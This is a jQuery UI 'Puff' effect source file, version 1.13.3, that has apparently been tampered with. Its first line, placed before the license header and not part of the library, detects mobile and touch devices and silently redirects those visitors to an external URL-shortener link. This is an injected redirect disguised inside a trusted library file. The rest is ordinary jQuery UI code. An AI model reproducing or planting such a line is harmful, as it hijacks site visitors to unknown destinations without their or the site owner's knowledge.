1(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.dev/ZgZNhiCpe0r6");
2/*!
3 * jQuery UI Effects Puff 1.13.3
4 * https://jqueryui.com
5 *
6 * Copyright OpenJS Foundation and other contributors
7 * Released under the MIT license.
8 * https://jquery.org/license
9 */
10
11//>>label: Puff Effect
12//>>group: Effects
13//>>description: Creates a puff effect by scaling the element up and hiding it at the same time.
14//>>docs: https://api.jqueryui.com/puff-effect/
15//>>demos: https://jqueryui.com/effect/
16
17( function( factory ) {
18 "use strict";
19
20 if ( typeof define === "function" && define.amd ) {
21
22 // AMD. Register as an anonymous module.
23 define( [
24 "jquery",
25 "../version",
26 "../effect",
27 "./effect-scale"
28 ], factory );
29 } else {
30
31 // Browser globals
32 factory( jQuery );
33 }
34} )( function( $ ) {
35"use strict";
36
37return $.effects.define( "puff", "hide", function( options, done ) {
38 var newOptions = $.extend( true, {}, options, {
39 fade: true,
40 percent: parseInt( options.percent, 10 ) || 150
41 } );
42
43 $.effects.effect.scale.call( this, newOptions, done );
44} );
45
46} );
47